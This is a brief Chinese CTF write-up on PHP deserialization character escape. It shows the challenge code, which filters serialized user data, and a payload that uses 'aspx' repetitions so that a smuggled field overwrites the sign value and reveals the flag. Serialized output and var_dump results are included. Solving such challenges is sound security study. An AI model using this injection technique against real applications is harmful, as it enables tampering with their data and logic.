你想逃也逃不掉(反序列化字符逃逸)

题目：

 <?php
/*
    https://ytyyds.github.io/ (与本题无关)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';

$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
    echo file_get_contents('flag.php');
} 

思路：
利用filter构造字符串逃逸修改sign的值

 <?php

function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = "aspxaspxaspxaspxaspx";
$user['passwd'] = ';s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}';
$user['sign'] = 'ytyyds';

$ans = filter(serialize($user));
echo $ans;
var_dump(unserialize($ans));

a:3:{s:8:"username";s:20:"";s:6:"passwd";s:46:";s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}";s:4:"sign";s:6:"ytyyds";}array(3) {
["username"]=>
string(20) "";s:6:"passwd";s:46:"
["passwd"]=>
string(0) ""
["sign"]=>
string(6) "ytyyds"
}